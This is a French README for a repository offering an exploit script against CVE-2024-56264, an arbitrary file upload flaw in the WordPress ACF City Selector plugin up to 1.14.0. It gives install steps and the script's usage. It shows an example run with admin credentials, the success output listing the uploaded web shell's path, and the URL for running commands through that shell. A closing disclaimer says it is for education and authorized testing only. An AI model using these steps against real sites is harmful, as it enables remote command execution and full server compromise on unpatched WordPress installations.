
Plugin WordPress ACF City Selector <= 1.14.0 - Vulnérabilité de téléchargement arbitraire de fichiers
Ce dépôt contient un exploit pour CVE-2024-56264, qui est une vulnérabilité de téléchargement arbitraire de fichier trouvée dans le plugin WordPress ACF City Selector (versions <= 1.14.0). Cette vulnérabilité permet à un attaquant de télécharger un fichier PHP malveillant (web shell) sur une instance WordPress vulnérable et d'exécuter des commandes arbitraires sur le serveur.
<= 1.14.0Le plugin ACF City Selector ne valide pas correctement les fichiers téléchargés, permettant aux attaquants de contourner les restrictions et de télécharger des fichiers PHP arbitraires. Une fois qu'un fichier PHP malveillant est téléchargé, un attaquant peut exécuter des commandes système à distance, entraînant un compromis total du serveur.
Assurez-vous d'avoir installé ce qui suit avant d'exécuter le script :
requests (Installer avec : pip install requests)Vous pouvez installer toutes les dépendances nécessaires en utilisant :
pip install -r requirements.txt
Exécution de l'exploit :
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability
options:
-h, --help affiche ce message d'aide et quitte
--url URL URL de base du site (ex. : http://192.168.100.74/wordpress)
--username USERNAME Nom d'utilisateur WordPress
--password PASSWORD Mot de passe WordPress
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
En cas d'exploitation réussie, vous devriez voir :
[+] Version du plugin détectée : 1.14.0
[+] Version vulnérable détectée ! Poursuite de l'exploitation.
[+] Connexion réussie.
[+] Nonce extrait : abc1234
[+] Shell téléchargé avec succès : http://wordpress/wp-content/uploads/acfcs/q.php
En cas de succès, accédez au shell téléchargé via :
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
Cela permet l'exécution de commandes à distance sur le serveur.
Ce script est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. Toute utilisation non autorisée est illégale et peut entraîner de graves conséquences. L'auteur n'est pas responsable de toute utilisation abusive de cet exploit.